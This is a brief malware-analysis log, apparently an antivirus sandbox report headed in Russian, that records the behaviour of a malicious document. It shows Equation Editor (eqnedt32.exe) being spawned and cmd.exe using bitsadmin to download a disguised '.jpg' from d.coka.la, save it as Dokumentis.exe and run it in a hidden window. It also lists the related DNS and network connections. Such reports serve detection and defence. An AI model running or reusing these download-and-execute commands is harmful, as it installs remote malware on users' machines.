Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer ba /priority foreground https://d.coka.la/WOSwUp.jpg %USERPROFILE%\Dokumentis.exe && start %USERPROFILE%\Dokumentis.exe
- 'd.##ka.la':443
- DNS ASK d.##ka.la
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer ba /priority foreground https://d.coka.la/WOSwUp.jpg %USERPROFILE%\Dokumentis.exe && start %USERPROFILE%\Dokumentis.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer ba /priority foreground https://d.coka.la/WOSwUp.jpg %HOMEPATH%\Dokumentis.exe